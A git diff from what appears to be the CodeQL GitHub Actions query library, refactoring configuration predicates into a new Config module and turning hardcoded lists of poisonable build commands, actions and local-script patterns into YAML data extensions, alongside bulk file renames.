manual}/determinatesystems_magic-nix-cache-action.model.yml (100%) rename ql/lib/ext/{ => manual}/docker-practice_actions-setup-docker.model.yml (100%) rename ql/lib/ext/{ => manual}/docker_build-push-action.model.yml (100%) rename ql/lib/ext/{ => manual}/endbug_latest-tag.model.yml (100%) rename ql/lib/ext/{ => manual}/expo_expo-github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/firebaseextended_action-hosting-deploy.model.yml (100%) rename ql/lib/ext/{ => manual}/frabert_replace-string-action.model.yml (100%) rename ql/lib/ext/{ => manual}/franzdiebold_github-env-vars-action.model.yml (100%) rename ql/lib/ext/{ => manual}/gabrielbb_xvfb-action.model.yml (100%) rename ql/lib/ext/{ => manual}/game-ci_unity-builder.model.yml (100%) rename ql/lib/ext/{ => manual}/game-ci_unity-test-runner.model.yml (100%) rename ql/lib/ext/{ => manual}/gautamkrishnar_blog-post-workflow.model.yml (100%) rename ql/lib/ext/{ => manual}/getsentry_action-release.model.yml (100%) rename ql/lib/ext/{ => manual}/github_codeql-action.model.yml (100%) rename ql/lib/ext/{ => manual}/go-semantic-release_action.model.yml (100%) rename ql/lib/ext/{ => manual}/golangci_golangci-lint-action.model.yml (100%) rename ql/lib/ext/{ => manual}/gonuit_heroku-docker-deploy.model.yml (100%) rename ql/lib/ext/{ => manual}/goreleaser_goreleaser-action.model.yml (100%) rename ql/lib/ext/{ => manual}/gr2m_create-or-update-pull-request-action.model.yml (100%) rename ql/lib/ext/{ => manual}/gradle_gradle-build-action.model.yml (100%) rename ql/lib/ext/{ => manual}/haya14busa_action-cond.model.yml (100%) rename ql/lib/ext/{ => manual}/hexlet_project-action.model.yml (100%) rename ql/lib/ext/{ => manual}/ilammy_msvc-dev-cmd.model.yml (100%) rename ql/lib/ext/{ => manual}/ilammy_setup-nasm.model.yml (100%) rename ql/lib/ext/{ => manual}/imjohnbo_issue-bot.model.yml (100%) rename ql/lib/ext/{ => manual}/iterative_setup-cml.model.yml (100%) rename ql/lib/ext/{ => manual}/iterative_setup-dvc.model.yml (100%) rename ql/lib/ext/{ => manual}/jamesives_github-pages-deploy-action.model.yml (100%) rename ql/lib/ext/{ => manual}/jitterbit_get-changed-files.model.yml (100%) rename ql/lib/ext/{ => manual}/johnnymorganz_stylua-action.model.yml (100%) rename ql/lib/ext/{ => manual}/jsdaniell_create-json.model.yml (100%) rename ql/lib/ext/{ => manual}/jurplel_install-qt-action.model.yml (100%) rename ql/lib/ext/{ => manual}/jwalton_gh-ecr-push.model.yml (100%) rename ql/lib/ext/{ => manual}/khan_pull-request-comment-trigger.model.yml (100%) rename ql/lib/ext/{ => manual}/larsoner_circleci-artifacts-redirector-action.model.yml (100%) rename ql/lib/ext/{ => manual}/leafo_gh-actions-lua.model.yml (100%) rename ql/lib/ext/{ => manual}/leafo_gh-actions-luarocks.model.yml (100%) rename ql/lib/ext/{ => manual}/lucasbento_auto-close-issues.model.yml (100%) rename ql/lib/ext/{ => manual}/mad9000_actions-find-and-replace-string.model.yml (100%) rename ql/lib/ext/{ => manual}/magefile_mage-action.model.yml (100%) rename ql/lib/ext/{ => manual}/maierj_fastlane-action.model.yml (100%) rename ql/lib/ext/{ => manual}/manusa_actions-setup-minikube.model.yml (100%) rename ql/lib/ext/{ => manual}/marocchino_on_artifact.model.yml (100%) rename ql/lib/ext/{ => manual}/mattdavis0351_actions.model.yml (100%) rename ql/lib/ext/{ => manual}/meteorengineer_setup-meteor.model.yml (100%) rename ql/lib/ext/{ => manual}/metro-digital_setup-tools-for-waas.model.yml (100%) rename ql/lib/ext/{ => manual}/microsoft_setup-msbuild.model.yml (100%) rename ql/lib/ext/{ => manual}/mishakav_pytest-coverage-comment.model.yml (100%) rename ql/lib/ext/{ => manual}/mr-smithers-excellent_docker-build-push.model.yml (100%) rename ql/lib/ext/{ => manual}/msys2_setup-msys2.model.yml (100%) rename ql/lib/ext/{ => manual}/mxschmitt_action-tmate.model.yml (100%) rename ql/lib/ext/{ => manual}/mymindstorm_setup-emsdk.model.yml (100%) rename ql/lib/ext/{ => manual}/nanasess_setup-chromedriver.model.yml (100%) rename ql/lib/ext/{ => manual}/nanasess_setup-php.model.yml (100%) rename ql/lib/ext/{ => manual}/nick-fields_retry.model.yml (100%) rename ql/lib/ext/{ => manual}/octokit_graphql-action.model.yml (100%) rename ql/lib/ext/{ => manual}/octokit_request-action.model.yml (100%) rename ql/lib/ext/{ => manual}/olafurpg_setup-scala.model.yml (100%) rename ql/lib/ext/{ => manual}/paambaati_codeclimate-action.model.yml (100%) rename ql/lib/ext/{ => manual}/peter-evans_create-pull-request.model.yml (100%) rename ql/lib/ext/{ => manual}/peter-murray_issue-body-parser-action.model.yml (100%) rename ql/lib/ext/{ => manual}/plasmicapp_plasmic-action.model.yml (100%) rename ql/lib/ext/{ => manual}/preactjs_compressed-size-action.model.yml (100%) rename ql/lib/ext/{ => manual}/py-actions_flake8.model.yml (100%) rename ql/lib/ext/{ => manual}/py-actions_py-dependency-install.model.yml (100%) rename ql/lib/ext/{ => manual}/pyo3_maturin-action.model.yml (100%) rename ql/lib/ext/{ => manual}/reactivecircus_android-emulator-runner.model.yml (100%) rename ql/lib/ext/{ => manual}/redhat-plumbers-in-action_download-artifact.model.yml (100%) rename ql/lib/ext/{ => manual}/reggionick_s3-deploy.model.yml (100%) rename ql/lib/ext/{ => manual}/renovatebot_github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/roots_issue-closer-action.model.yml (100%) rename ql/lib/ext/{ => manual}/ros-tooling_setup-ros.model.yml (100%) rename ql/lib/ext/{ => manual}/ruby_setup-ruby.model.yml (100%) rename ql/lib/ext/{ => manual}/salsify_action-detect-and-tag-new-version.model.yml (100%) rename ql/lib/ext/{ => manual}/sergeysova_jq-action.model.yml (100%) rename ql/lib/ext/{ => manual}/shallwefootball_upload-s3-action.model.yml (100%) rename ql/lib/ext/{ => manual}/shogo82148_actions-setup-perl.model.yml (100%) rename ql/lib/ext/{ => manual}/skitionek_notify-microsoft-teams.model.yml (100%) rename ql/lib/ext/{ => manual}/snow-actions_eclint.model.yml (100%) rename ql/lib/ext/{ => manual}/stackhawk_hawkscan-action.model.yml (100%) rename ql/lib/ext/{ => manual}/step-security_harden-runner.model.yml (100%) rename ql/lib/ext/{ => manual}/suisei-cn_actions-download-file.model.yml (100%) rename ql/lib/ext/{ => manual}/tibdex_backport.model.yml (100%) rename ql/lib/ext/{ => manual}/timheuer_base64-to-file.model.yml (100%) rename ql/lib/ext/{ => manual}/tj-actions_branch-names.model.yml (100%) rename ql/lib/ext/{ => manual}/trilom_file-changes-action.model.yml (100%) rename ql/lib/ext/{ => manual}/tripss_conventional-changelog-action.model.yml (100%) rename ql/lib/ext/{ => manual}/tryghost_action-deploy-theme.model.yml (100%) rename ql/lib/ext/{ => manual}/tzkhan_pr-update-action.model.yml (100%) rename ql/lib/ext/{ => manual}/veracode_veracode-sca.model.yml (100%) rename ql/lib/ext/{ => manual}/wearerequired_lint-action.model.yml (100%) rename ql/lib/ext/{ => manual}/webfactory_ssh-agent.model.yml (100%) rename ql/lib/ext/{ => manual}/xt0rted_slash-command-action.model.yml (100%) rename ql/lib/ext/{ => manual}/zaproxy_action-baseline.model.yml (100%) rename ql/lib/ext/{ => manual}/zaproxy_action-full-scan.model.yml (100%) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index da54833e9a66..8d965c3e4c71 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1,7 +1,7 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations private import codeql.actions.Helper -private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.config.Config /** * Gets the length of each line in the StringValue . diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll new file mode 100644 index 000000000000..d6a85c426c68 --- /dev/null +++ b/ql/lib/codeql/actions/config/Config.qll @@ -0,0 +1,74 @@ +import ConfigExtensions as Extensions + +/** + * MaD models for workflow details + * Fields: + * - path: Path to the workflow file + * - trigger: Trigger for the workflow + * - job: Job name + * - secrets_source: Source of secrets + * - permissions: Permissions for the workflow + * - runner: Runner info for the workflow + */ +predicate workflowDataModel( + string path, string trigger, string job, string secrets_source, string permissions, string runner +) { + Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) +} + +/** + * MaD models for repository details + * Fields: + * - visibility: Visibility of the repository + * - default_branch_name: Default branch name + */ +predicate repositoryDataModel(string visibility, string default_branch_name) { + Extensions::repositoryDataModel(visibility, default_branch_name) +} + +/** + * MaD models for context/trigger mapping + * Fields: + * - trigger: Trigger for the workflow + * - context_prefix: Prefix for the context + */ +predicate contextTriggerDataModel(string trigger, string context_prefix) { + Extensions::contextTriggerDataModel(trigger, context_prefix) +} + +/** + * MaD models for externally triggerable events + * Fields: + * - event: Event name + */ +predicate externallyTriggerableEventsDataModel(string event) { + Extensions::externallyTriggerableEventsDataModel(event) +} + +/** + * MaD models for poisonable commands + * Fields: + * - regexp: Regular expression for matching poisonable commands + */ +predicate poisonableCommandsDataModel(string regexp) { + Extensions::poisonableCommandsDataModel(regexp) +} + +/** + * MaD models for poisonable local scripts + * Fields: + * - regexp: Regular expression for matching poisonable local scripts + * - group: Script capture group number for the regular expression + */ +predicate poisonableLocalScriptsDataModel(string regexp, int group) { + Extensions::poisonableLocalScriptsDataModel(regexp, group) +} + +/** + * MaD models for poisonable actions + * Fields: + * - action: action name + */ +predicate poisonableActionsDataModel(string action) { + Extensions::poisonableActionsDataModel(action) +} diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll new file mode 100644 index 000000000000..3ca4b6a75593 --- /dev/null +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -0,0 +1,41 @@ +/** + * This module provides extensible predicates for defining MaD models. + */ + +/** + * Holds if workflow data model exists for the given parameters. + */ +extensible predicate workflowDataModel( + string path, string trigger, string job, string secrets_source, string permissions, string runner +); + +/** + * Holds if repository data model exists for the given parameters. + */ +extensible predicate repositoryDataModel(string visibility, string default_branch_name); + +/** + * Holds if a context expression starting with context_prefix is available for a given trigger. + */ +extensible predicate contextTriggerDataModel(string trigger, string context_prefix); + +/** + * Holds if a given trigger event can be fired by an external actor. + */ +extensible predicate externallyTriggerableEventsDataModel(string event); + +/** + * Holds for strings that match poisonable commands. + */ +extensible predicate poisonableCommandsDataModel(string regexp); + +/** + * Holds for strings that match poisonable local scripts. + */ +extensible predicate poisonableLocalScriptsDataModel(string regexp, int group); + +/** + * Holds for actions that can be poisoned through local files. + */ +extensible predicate poisonableActionsDataModel(string action); + diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index d0b84f918d59..2cb8c56b147f 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -2,51 +2,6 @@ private import internal.ExternalFlowExtensions as Extensions private import codeql.actions.DataFlow private import actions -/** - * MaD models for workflow details - * Fields: - * - path: Path to the workflow file - * - trigger: Trigger for the workflow - * - job: Job name - * - secrets_source: Source of secrets - * - permissions: Permissions for the workflow - * - runner: Runner info for the workflow - */ -predicate workflowDataModel( - string path, string trigger, string job, string secrets_source, string permissions, string runner -) { - Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) -} - -/** - * MaD models for repository details - * Fields: - * - visibility: Visibility of the repository - * - default_branch_name: Default branch name - */ -predicate repositoryDataModel(string visibility, string default_branch_name) { - Extensions::repositoryDataModel(visibility, default_branch_name) -} - -/** - * MaD models for context/trigger mapping - * Fields: - * - trigger: Trigger for the workflow - * - context_prefix: Prefix for the context - */ -predicate contextTriggerDataModel(string trigger, string context_prefix) { - Extensions::contextTriggerDataModel(trigger, context_prefix) -} - -/** - * MaD models for externally triggerable events - * Fields: - * - event: Event name - */ -predicate externallyTriggerableEventsDataModel(string event) { - Extensions::externallyTriggerableEventsDataModel(event) -} - /** * MaD sources * Fields: diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 7217796d138b..b09664359abc 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,5 +1,6 @@ -private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.config.Config +private import codeql.actions.dataflow.ExternalFlow /** * A data flow source. diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 05f71cfc0be6..bd9d73b41703 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -22,25 +22,3 @@ extensible predicate actionsSummaryModel( extensible predicate actionsSinkModel( string action, string version, string input, string kind, string provenance ); - -/** - * Holds if workflow data model exists for the given parameters. - */ -extensible predicate workflowDataModel( - string path, string trigger, string job, string secrets_source, string permissions, string runner -); - -/** - * Holds if repository data model exists for the given parameters. - */ -extensible predicate repositoryDataModel(string visibility, string default_branch_name); - -/** - * Holds if a context expression starting with context_prefix is available for a given trigger. - */ -extensible predicate contextTriggerDataModel(string trigger, string context_prefix); - -/** - * Holds if a given trigger event can be fired by an external actor. - */ -extensible predicate externallyTriggerableEventsDataModel(string event); diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 44c3c64a5a69..d2853591d61e 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -254,8 +254,8 @@ class ArtifactPoisoningSink extends DataFlow::Node { poisonable.(UsesStep) = this.asExpr() ) and ( - not poisonable instanceof LocalCommandExecutionRunStep or - poisonable.(LocalCommandExecutionRunStep).getCommand().matches(download.getPath() + "%") + not poisonable instanceof LocalScriptExecutionRunStep or + poisonable.(LocalScriptExecutionRunStep).getCommand().matches(download.getPath() + "%") ) ) } diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index e80ea71c958a..1a3e7b2b2f7c 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -1,5 +1,5 @@ import actions -import codeql.actions.dataflow.ExternalFlow +import codeql.actions.config.Config string defaultBranchTriggerEvent() { result = diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index b1d5269d44a3..d9978b2a4239 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -1,67 +1,35 @@ import actions +import codeql.actions.config.Config abstract class PoisonableStep extends Step { } -// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 private string dangerousActions() { - result = - [ - "pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", - "ruby/setup-ruby", "actions/jekyll-build-pages" - ] + exists(string action | + poisonableActionsDataModel(action) and + result = action + ) } class DangerousActionUsesStep extends PoisonableStep, UsesStep { DangerousActionUsesStep() { this.getCallee() = dangerousActions() } } -// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23 -private string dangerousCommands() { - result = - [ - "npm i(nstall)?(\\b|$)", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", - "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", - "msbuild ", "mvn ", "gradle ", "bundle install", "bundle exec ", "^ant ", "mkdocs build", - "pytest", "pip install -r ", "pip install --requirement", "java -jar ", "poetry install", - "poetry run", "cargo " - ] -} - -class BuildRunStep extends PoisonableStep, Run { - BuildRunStep() { - exists( - this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + dangerousCommands(), _, _) +class PoisonableCommandStep extends PoisonableStep, Run { + PoisonableCommandStep() { + exists(string regexp | + poisonableCommandsDataModel(regexp) and + exists(this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + regexp, _, _)) ) } } -bindingset[cmdRegexp] -string wrapLocalCmd(string cmdRegexp) { result = "(^|;\\s*|\\s+)" + cmdRegexp + "(\\s+|;|$)" } - -class LocalCommandExecutionRunStep extends PoisonableStep, Run { +class LocalScriptExecutionRunStep extends PoisonableStep, Run { string cmd; - LocalCommandExecutionRunStep() { - // Heuristic: - exists(string line | line = this.getScript().splitAt("\n").trim() | - // ./xxxx - // TODO: It could also be in the form of `dir/cmd` - cmd = line.regexpCapture(wrapLocalCmd("\\.\\/(.*)"), 2) - or - // sh xxxx - cmd = line.regexpCapture(wrapLocalCmd("(ba|z|fi)?sh\\s+(.*)"), 3) - or - // node xxxx.js - cmd = line.regexpCapture(wrapLocalCmd("node\\s+(.*)(\\.js|\\.ts)"), 2) - or - // python xxxx.py - cmd = line.regexpCapture(wrapLocalCmd("python\\s+(.*)\\.py"), 2) - or - // ruby xxxx.rb - cmd = line.regexpCapture(wrapLocalCmd("ruby\\s+(.*)\\.rb"), 2) - or - // go xxxx.go - cmd = line.regexpCapture(wrapLocalCmd("go\\s+(.*)\\.go"), 2) + LocalScriptExecutionRunStep() { + exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | + poisonableLocalScriptsDataModel(regexp, group) and + cmd = line.regexpCapture(regexp, group) ) } diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 03b6c87405e7..419b2ac81a97 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -1,5 +1,5 @@ import actions -import codeql.actions.dataflow.ExternalFlow +import codeql.actions.config.Config bindingset[runner] predicate isGithubHostedRunner(string runner) { diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/config/context_event_map.yml similarity index 78% rename from ql/lib/ext/workflow-models/workflow-models.yml rename to ql/lib/ext/config/context_event_map.yml index 1f0401e8e616..e09dab14f2b8 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -1,12 +1,4 @@ extensions: - - addsTo: - pack: github/actions-all - extensible: repositoryDataModel - data: [] - - addsTo: - pack: github/actions-all - extensible: workflowDataModel - data: [] - addsTo: pack: github/actions-all extensible: contextTriggerDataModel @@ -54,19 +46,4 @@ extensions: - ["workflow_call", "github.event.review"] - ["workflow_call", "github.event.workflow"] - ["workflow_call", "github.event.workflow_run"] - - addsTo: - pack: github/actions-all - extensible: externallyTriggerableEventsDataModel - data: - - ["discussion"] - - ["discussion_comment"] - - ["fork"] - - ["issue_comment"] - - ["issues"] - - ["pull_request"] - - ["pull_request_comment"] - - ["pull_request_review"] - - ["pull_request_review_comment"] - - ["pull_request_target"] - - ["workflow_run"] # depending on trigger workflow - - ["workflow_call"] # depending on caller + diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml new file mode 100644 index 000000000000..88d17c728b75 --- /dev/null +++ b/ql/lib/ext/config/externally_triggereable_events.yml @@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: externallyTriggerableEventsDataModel + data: + - ["discussion"] + - ["discussion_comment"] + - ["fork"] + - ["issue_comment"] + - ["issues"] + - ["pull_request"] + - ["pull_request_comment"] + - ["pull_request_review"] + - ["pull_request_review_comment"] + - ["pull_request_target"] + - ["workflow_run"] # depending on trigger workflow + - ["workflow_call"] # depending on caller + diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml new file mode 100644 index 000000000000..9a9af08872c8 --- /dev/null +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -0,0 +1,55 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: poisonableActionsDataModel + # source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 + # source: https://boostsecurityio.github.io/lotp/ + data: + - ["pre-commit/action"] + - ["oxsecurity/megalinter"] + - ["bridgecrewio/checkov-action"] + - ["ruby/setup-ruby"] + - ["actions/jekyll-build-pages"] + - addsTo: + pack: github/actions-all + extensible: poisonableCommandsDataModel + # source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23 + # source: https://boostsecurityio.github.io/lotp/ + data: + - ["ant "] + - ["bundle install"] + - ["bundle exec "] + - ["cargo "] + - ["go generate"] + - ["gomplate "] + - ["gradle "] + - ["java -jar "] + - ["make "] + - ["mkdocs build"] + - ["msbuild "] + - ["mvn "] + - ["npm i(nstall)?(\\b|$)"] + - ["npm run "] + - ["npm ci(\\b|$)"] + - ["pip install -r "] + - ["pip install --requirement"] + - ["poetry install"] + - ["poetry run"] + - ["pre-commit run"] + - ["pre-commit install"] + - ["pytest"] + - ["terraform plan"] + - ["terraform apply"] + - ["yarn "] + - addsTo: + pack: github/actions-all + extensible: poisonableLocalScriptsDataModel + data: + # TODO: It could also be in the form of `dir/cmd` + - ["(^|;\\s*|\\s+)(\\.\\/)(.*)(\\s+|;|$)", 3] + - ["(^|;\\s*|\\s+)(source|sh|bash|zsh|fish)\\s+(.*)(\\s+|;|$)", 3] + - ["(^|;\\s*|\\s+)(node)\\s+(.*)(\\.js|\\.ts)(\\s+|;|$)", 3] + - ["(^|;\\s*|\\s+)(python)\\s+(.*)\\.py(\\s+|;|$)", 3] + - ["(^|;\\s*|\\s+)(ruby)\\s+(.*)\\.rb(\\s+|;|$)", 3] + - ["(^|;\\s*|\\s+)(go)\\s+(.*)\\.go(\\s+|;|$)", 3] + diff --git a/ql/lib/ext/config/workflow_runtime_data.yml b/ql/lib/ext/config/workflow_runtime_data.yml new file mode 100644 index 000000000000..88e266d8142a --- /dev/null +++ b/ql/lib/ext/config/workflow_runtime_data.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: repositoryDataModel + data: [] + - addsTo: + pack: github/actions-all + extensible: workflowDataModel + data: [] diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/manual/8398a7_action-slack.model.yml similarity index 100% rename from ql/lib/ext/8398a7_action-slack.model.yml rename to ql/lib/ext/manual/8398a7_action-slack.model.yml diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml similarity index 100% rename from ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml rename to ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/manual/actions_github-script.model.yml similarity index 100% rename from ql/lib/ext/actions_github-script.model.yml rename to ql/lib/ext/manual/actions_github-script.model.yml diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml similarity index 100% rename from ql/lib/ext/ahmadnassri_action-changed-files.model.yml rename to ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml similarity index 100% rename from ql/lib/ext/akhileshns_heroku-deploy.model.yml rename to ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml similarity index 100% rename from ql/lib/ext/amannn_action-semantic-pull-request.model.yml rename to ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/manual/anchore_sbom-action.model.yml similarity index 100% rename from ql/lib/ext/anchore_sbom-action.model.yml rename to ql/lib/ext/manual/anchore_sbom-action.model.yml diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/manual/anchore_scan-action.model.yml similarity index 100% rename from ql/lib/ext/anchore_scan-action.model.yml rename to ql/lib/ext/manual/anchore_scan-action.model.yml diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/manual/andresz1_size-limit-action.model.yml similarity index 100% rename from ql/lib/ext/andresz1_size-limit-action.model.yml rename to ql/lib/ext/manual/andresz1_size-limit-action.model.yml diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/manual/android-actions_setup-android.model.yml similarity index 100% rename from ql/lib/ext/android-actions_setup-android.model.yml rename to ql/lib/ext/manual/android-actions_setup-android.model.yml diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml similarity index 100% rename from ql/lib/ext/apple-actions_import-codesign-certs.model.yml rename to ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/manual/asdf-vm_actions.model.yml similarity index 100% rename from ql/lib/ext/asdf-vm_actions.model.yml rename to ql/lib/ext/manual/asdf-vm_actions.model.yml diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml similarity index 100% rename from ql/lib/ext/ashley-taylor_read-json-property-action.model.yml rename to ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml similarity index 100% rename from ql/lib/ext/ashley-taylor_regex-property-action.model.yml rename to ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/manual/aszc_change-string-case-action.model.yml similarity index 100% rename from ql/lib/ext/aszc_change-string-case-action.model.yml rename to ql/lib/ext/manual/aszc_change-string-case-action.model.yml diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml similarity index 100% rename from ql/lib/ext/aws-actions_configure-aws-credentials.model.yml rename to ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml similarity index 100% rename from ql/lib/ext/axel-op_googlejavaformat-action.model.yml rename to ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/manual/azure_powershell.model.yml similarity index 100% rename from ql/lib/ext/azure_powershell.model.yml rename to ql/lib/ext/manual/azure_powershell.model.yml diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/manual/bahmutov_npm-install.model.yml similarity index 100% rename from ql/lib/ext/bahmutov_npm-install.model.yml rename to ql/lib/ext/manual/bahmutov_npm-install.model.yml diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/manual/blackducksoftware_github-action.model.yml similarity index 100% rename from ql/lib/ext/blackducksoftware_github-action.model.yml rename to ql/lib/ext/manual/blackducksoftware_github-action.model.yml diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/manual/bobheadxi_deployments.model.yml similarity index 100% rename from ql/lib/ext/bobheadxi_deployments.model.yml rename to ql/lib/ext/manual/bobheadxi_deployments.model.yml diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml similarity index 100% rename from ql/lib/ext/bufbuild_buf-breaking-action.model.yml rename to ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml similarity index 100% rename from ql/lib/ext/bufbuild_buf-lint-action.model.yml rename to ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml similarity index 100% rename from ql/lib/ext/bufbuild_buf-setup-action.model.yml rename to ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/manual/cachix_cachix-action.model.yml similarity index 100% rename from ql/lib/ext/cachix_cachix-action.model.yml rename to ql/lib/ext/manual/cachix_cachix-action.model.yml diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/manual/changesets_action.model.yml similarity index 100% rename from ql/lib/ext/changesets_action.model.yml rename to ql/lib/ext/manual/changesets_action.model.yml diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml similarity index 100% rename from ql/lib/ext/cloudflare_wrangler-action.model.yml rename to ql/lib/ext/manual/cloudflare_wrangler-action.model.yml diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/manual/coursier_cache-action.model.yml similarity index 100% rename from ql/lib/ext/coursier_cache-action.model.yml rename to ql/lib/ext/manual/coursier_cache-action.model.yml diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml 